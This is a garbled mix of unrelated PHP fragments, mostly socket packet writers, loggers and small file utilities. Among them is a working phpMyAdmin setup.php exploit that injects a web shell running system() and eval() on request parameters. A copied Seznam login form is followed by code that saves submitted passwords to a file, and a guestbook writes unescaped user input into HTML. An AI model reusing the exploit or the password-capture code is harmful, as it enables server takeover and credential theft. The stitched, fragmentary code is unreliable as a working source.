private function WriteData($Command, $String = "")
{
$Data = Pack('VV', $this->RequestId++, $Command) . $String . "";
$Data = Pack('V', StrLen($Data)) . $Data;
$Length = StrLen($Data);
return $Length === FWrite($this->Socket, $Data, $Length);
}
private static function _log($data, $level, $withTimestamp)
{
$prependText = $withTimestamp ? date('j.n.Y H:i:s') . ' : ' : '';
if ($level == 'err') {
$fileNameSuffix = '-error';
// naformatovanie dat tak aby boli pekne zarovnane
$sid = str_pad(session_id(), 26, ' ');
$ip = str_pad($_SERVER['REMOTE_ADDR'], 15, ' ');
$prependText .= "SID:{$sid} , IP:{$ip} , ";
} else {
$fileNameSuffix = '';
}
if (is_array($data) || is_object($data)) {
$data = PHP_EOL . var_export($data, true);
}
if (is_bool($data)) {
$data = $data ? 'boolean true' : 'boolean false';
}
try {
$f = FOpen(LOG_DIR . date('Y-m-d') . "{$fileNameSuffix}.txt", "a");
FWrite($f, $prependText . $data . PHP_EOL);
FClose($f);
} catch (Exception $e) {
}
}
public function Write($Header, $String = '')
{
// Pack the packet together
$Command = Pack('VV', ++$this->RconRequestId, $Header) . $String . "";
// Prepend packet length
$Command = Pack('V', StrLen($Command)) . $Command;
$Length = StrLen($Command);
return $Length === FWrite($this->RconSocket, $Command, $Length);
}
private function WriteData($Command, $String = "")
{
// Pack the packet together
$Data = Pack('VV', $this->RequestId++, $Command) . $String . chr(0) . '' . chr(0);
// Prepend packet length
$Data = Pack('V', StrLen($Data)) . $Data;
$Length = StrLen($Data);
return $Length === FWrite($this->Socket, $Data, $Length);
}
/**
* Generates random file
* @param string $location
* @param int $size in kb
*/
function generateFile($location, $size)
{
$fp = fopen($location, "wb");
$toWrite = "";
for ($y = 0; $y < 1024; $y++) {
// One kb of content
$toWrite .= chr(rand(0, 255));
}
for ($i = 0; $i < $size; $i++) {
FWrite($fp, $toWrite);
}
fclose($fp);
}
public function Write($Header, $String = '')
{
switch ($this->Socket->Engine) {
case CI_SourceQuery::GOLDSOURCE:
$Command = Pack('cccca*', 0xff, 0xff, 0xff, 0xff, $String);
$Length = StrLen($Command);
return $Length === FWrite($this->Socket->Socket, $Command, $Length);
case CI_SourceQuery::SOURCE:
// Pack the packet together
$Command = Pack('VV', ++$this->RequestId, $Header) . $String . "";
// Prepend packet length
$Command = Pack('V', StrLen($Command)) . $Command;
$Length = StrLen($Command);
return $Length === FWrite($this->RconSocket, $Command, $Length);
}
}
function SaveUploadedFile($Table, $ID, $File)
{
#-------------------------------------------------------------------------------
$FilePaths = GetFilePath($Table, $ID);
#-------------------------------------------------------------------------------
# создаём директорию
if (!File_Exists($FilePaths['FileDir'])) {
if (!MkDir($FilePaths['FileDir'], 0700, true)) {
return new gException('CANNOT_CREATE_DIRECTORY', 'Не удалось создать директорию для сохранения файла');
}
}
#-------------------------------------------------------------------------------
# сохраняем файл
$fp = FOpen($FilePaths['FilePath'], 'w');
FWrite($fp, $File);
FClose($fp);
#-------------------------------------------------------------------------------
return TRUE;
#-------------------------------------------------------------------------------
}
function BuildItemDesc($file)
{
print " * Loading multis config file...\n";
$cfg_file = ReadConfigFile($file);
if ($cfg_file == FALSE) {
print "Cant open {$file} ({$php_errormsg}). Blame Stephen Donald.\n";
exit;
}
print " * Purging itemdesc.cfg for new write...\n";
$handle = FOpen("itemdesc.cfg", "w");
FClose($handle);
$handle = FOpen("itemdesc.cfg", "a");
print " * Finding elem names...";
$elem_names = GetConfigStringKeys($cfg_file, CLASS_LABELS_ON);
print "(" . Count($elem_names) . ")\n";
foreach ($elem_names as $elem_name) {
if (!Preg_Match("/^House\\s+/i", $elem_name)) {
continue;
}
$multi_id = Preg_Replace("/^House\\s+/i", "", $elem_name);
$objtype = HexDec($multi_id);
$objtype += 16384;
// 0x4000
$objtype = "0x" . DecHex($objtype);
FWrite($handle, "House {$objtype}\n");
FWrite($handle, "{\n");
FWrite($handle, "\t// Main Stuff\n");
FWrite($handle, "\tName\t\tHouse{$objtype}\n");
FWrite($handle, "\tGraphic\t\t{$objtype}\n");
FWrite($handle, "\n");
FWrite($handle, "\t// Multi Info\n");
FWrite($handle, "\tMultiID\t\t{$multi_id}\n");
FWrite($handle, "}\n\n");
}
FClose($handle);
return 1;
}
private function WriteData($Command, $Append = "")
{
$Command = Pack('c*', 0xfe, 0xfd, $Command, 0x1, 0x2, 0x3, 0x4) . $Append;
$Length = StrLen($Command);
if ($Length !== FWrite($this->Socket, $Command, $Length)) {
throw new MinecraftQueryException("Failed to write on socket.");
}
$Data = FRead($this->Socket, 2048);
if ($Data === false) {
throw new MinecraftQueryException("Failed to read from socket.");
}
if (StrLen($Data) < 5 || $Data[0] != $Command[2]) {
return false;
}
return SubStr($Data, 5);
}
<?php
$fp = FOpen("gbook.txt", "w");
FWrite($fp, "");
FClose($fp);
echo "Soubor gbook.txt byl vyprazdnen.";
public function Write($Header, $String = '')
{
$Command = Pack('ccccca*', 0xff, 0xff, 0xff, 0xff, $Header, $String);
$Length = StrLen($Command);
return $Length === FWrite($this->Socket, $Command, $Length);
}
function exploit($w00t)
{
$Handlex = FOpen("pmaPWN.log", "a+");
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) ";
//firefox
//first get cookie + token
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
//URL
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
//return site as string
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
$result = curl_exec($curl);
curl_close($curl);
if (preg_match_all("/token\"\\s+value=\"([^>]+?)\"/", $result, $matches)) {
}
$token = $matches[1][1];
if ($token != '') {
print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
$payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
print "\n[+] Sending evil payload mwahaha.. \n";
FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_REFERER, $w00t);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
$result = curl_exec($curl);
curl_close($curl);
print "\n[!] w00t! w00t! You should now have shell here";
print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
} else {
print "\n[!] Shit! no luck.. not vulnerable\n";
FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
return false;
}
FClose($Handlex);
if (file_exists('exploitcookie.txt')) {
unlink('exploitcookie.txt');
}
//exit();
}
function Write($message)
{
FWrite($this->serverLogHandle, $message . "\n");
}
private function image_gif($savePath)
{
if ($this->ani_gif && is_array($this->ani_imageResized) && count($this->ani_imageResized) > 1) {
$newa = array();
foreach ($this->ani_imageResized as $i) {
ob_start();
imagegif($i);
$gifdata = ob_get_clean();
$newa[] = $gifdata;
}
if ($gifmerge = new GIFEncoder($newa, $this->ani_delays, 9999, $this->ani_disposal, $this->ani_transparent['r'], $this->ani_transparent['g'], $this->ani_transparent['b'], "bin")) {
FWrite(FOpen($savePath, "wb"), $gifmerge->GetAnimation());
} else {
imagegif($this->ani_imageResized[0], $savePath);
}
} else {
imagegif($this->imageResized, $savePath);
}
}
function WriteElemToFile(&$elem_name, &$elem_lines)
{
$handle = FOpen("CleanedConfig.cfg", "a");
FWrite($handle, "{$elem_name}\n");
FWrite($handle, "{\n");
foreach ($elem_lines as $property => $values) {
foreach ($values as $value) {
FWrite($handle, "\t{$property}\t{$value}\n");
}
}
FWrite($handle, "}\n\n");
FClose($handle);
return 1;
}
$text = str_replace("[/pre]", "</pre>", $text);
$text = nl2br($text);
//Zjištění data a času
//SetLocale("LC_ALL", "Czech"); //Nastavení českého prostředí
$datum = Date("j/m/Y H:i:s", Time());
//Otevření souboru
$fp = FOpen("gbook.txt", "a+");
//Zápis dat do souboru
FWrite($fp, "<div class=\"prispevek\">\n");
FWrite($fp, "<meta name=\"IP\" content=\"" . $_SERVER[REMOTE_ADDR] . "\">\n");
FWrite($fp, "<div class=\"nadpis\">" . $title . "</div>\n");
FWrite($fp, "<div class=\"jmeno\"> vložil: " . $name . " - " . $contact . "</div>\n");
FWrite($fp, "<div class=\"datum\">" . $datum . "</div><br />\n");
FWrite($fp, "<div class=\"text\">\n");
FWrite($fp, $text);
FWrite($fp, "\n</div></div>\n\n");
//Uzavření souboru
FClose($fp);
//Výpisy
echo "<b><font color=\"red\">Příspěvek byl korektně uložen!<br />Vaše IP adresa: " . $_SERVER[REMOTE_ADDR] . " byla uložena!</font></b> <meta http-equiv=\"refresh\" content=\"1\">";
} else {
echo "<b><font color=\"red\" title=\"Nezapomeňte na pole ochrany proti spamu!!!\">Nezapomeňte vyplnit všechna pole!</font></b>";
}
?>
</div>
<?php
//Vypsání celého souboru
$fp = FOpen("gbook.txt", "r+");
FPassThru($fp);
FClose($fp);
function __Send($message)
{
if (StrLen($message) <= 0) {
return false;
}
$this->WriteToLog("S-> (" . $this->id . ")\t" . $message, 10);
$r = FWrite($this->sock, $message);
return $r !== false;
}
case 'exception':
return new gException('TASK_NOT_FOUND', 'Задание не найдено');
case 'array':
break;
default:
return ERROR | @Trigger_Error(101);
}
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
$Tmp = System_Element('tmp');
if (Is_Error($Tmp)) {
return ERROR | @Trigger_Error(500);
}
#-------------------------------------------------------------------------------
$Marker = FOpen(SPrintF('%s/TaskLastExecute.txt', $Tmp), 'w');
FWrite($Marker, Date('YmdHis'));
FClose($Marker);
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
$TaskID = $Task['ID'];
#-------------------------------------------------------------------------------
$Free = DB_Query(SPrintF("SELECT IS_FREE_LOCK('Tasks%s') as `IsFree`", $TaskID));
if (Is_Error($Free)) {
return ERROR | @Trigger_Error(500);
}
#-------------------------------------------------------------------------------
$Rows = MySQL::Result($Free);
if (Is_Error($Rows)) {
return ERROR | @Trigger_Error(500);
}
#-------------------------------------------------------------------------------
\t\t</p>
\t\t<p class="remember">
\t\t\t<input type="checkbox" name="remember" id="remember" value="1" /><label for="remember">pøihlásit trvale na tomto poèítaèi</a></label> - <a href="http://napoveda.seznam.cz/cz/prihlaseni.html">Co to je?</a>
\t\t</p>
\t\t<p class="submit-row">
\t\t\t<input type="submit" class="submit" value="Pøihlásit se" tabindex="4" />
\t\t\t<input type="hidden" name="serviceId" value="email" />
\t\t\t<input type="hidden" name="disableSSL" value="0" />
\t\t\t<input type="hidden" name="forceSSL" value="0" />
\t\t\t<input type="hidden" name="lang" value="cz" />
\t\t\t<input type="hidden" name="template" value="html" />
\t\t\t<input type="hidden" name="lang" value="cz" />
\t\t\t<input type="hidden" name="loggedURL" value="http://email.seznam.cz/ticket" />
\t\t\t<input type="hidden" name="returnURL" value="" />
\t\t\t<input type="hidden" name="loginFormIsSSL" value="0" />
\t\t</p>
\t</form>
END;
echo '+ ' . ($a + $b) . "<br />";
echo "- " . ($a - $b) . "<br>";
echo "/ " . $b / $a . "<br>";
echo "* " . $a * $b . "<br>";
echo "<br />";
$fp = FOpen("data.txt", "a");
//a = doplnìní w = zápis r = ètení
FWrite($fp, $_POST["password"]);
// uloží obsah promìnné $data do souboru data2.txt
private function WriteData($Command, $Append = "")
{
$Command = Pack('c*', 0xfe, 0xfd, $Command, 0x1, 0x2, 0x3, 0x4) . $Append;
$Length = StrLen($Command);
if ($Length !== FWrite($this->Socket, $Command, $Length)) {
return false;
}
$Data = FRead($this->Socket, 1440);
if (StrLen($Data) < 5 || $Data[0] != $Command[2]) {
return false;
}
return SubStr($Data, 5);
}
<?php
$fp = FOpen("pocitadlo.txt", "r");
$pocet = FRead($fp, 90);
FClose($fp);
$pocet = $pocet + 1;
$fp = FOpen("pocitadlo.txt", "w");
FWrite($fp, $pocet);
FClose($fp);
echo "Navstev: " . $pocet;
FUNCTION LogFile($nick, $class, $action, $logaction) {
GLOBAL $VA_setup;
$log = $VA_setup['log_format'];
$log = EregI_Replace("%time%", Date($VA_setup['time_format']), $log);
$log = EregI_Replace("%date%", Date($VA_setup['date_format']), $log);
$log = EregI_Replace("%nick%", $nick, $log);
$log = EregI_Replace("%class%", $class, $log);
$log = EregI_Replace("%ip%", $_SERVER['REMOTE_ADDR'], $log);
$log = EregI_Replace("%host%", GetHostByAddr($_SERVER['REMOTE_ADDR']), $log);
$log = EregI_Replace("%action%", $action, $log);
//If loging by action is enabled log to file by action name
IF(EregI("%logfileaction%", $log)) {
$write = EregI_Replace("%logfileaction%", "", $log);
$write = EregI_Replace("%logfilenick%", "", $write);
$file = @FOpen($VA_setup['log_dir'].$logaction.".log", "a+");
@FWrite($file, $write."\r\n");
@FClose($file);
}
//If loging by nick is enabled log to file by nick name
IF(EregI("%logfilenick%", $log)) {
$write = EregI_Replace("%logfileaction%", "", $log);
$write = EregI_Replace("%logfilenick%", "", $write);
$file = @FOpen($VA_setup['log_dir'].$nick.".log", "a+");
@FWrite($file, $write."\r\n");
@FClose($file);
}
RETURN;
}
